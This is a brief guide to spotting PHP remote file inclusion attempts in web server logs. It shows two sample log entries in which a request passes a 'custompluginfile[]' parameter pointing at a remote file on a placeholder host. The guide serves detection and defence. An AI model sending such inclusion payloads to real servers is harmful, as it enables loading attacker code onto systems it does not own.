How to find PHP injection through logs
URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities
Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)
Request —– IP attacked —— IP of attacker
————————————————————————————————
Request: xxxx.com 111.222.333.444 – - [19/Apr/2009:08:35:02 -0500] “GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1″ 500 3572 “-” “Mozilla/5.0″ SesohkAx1jYAAFNIEg0 “-”
Request: xxxx.com 111.222.333.444 – - [19/Apr/2009:08:35:03 -0500] “GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1″ 500 3572 “-” “Mozilla/5.0″ Sesoh0Ax1jYAAFN@Eng “-”
————————————————————————————————
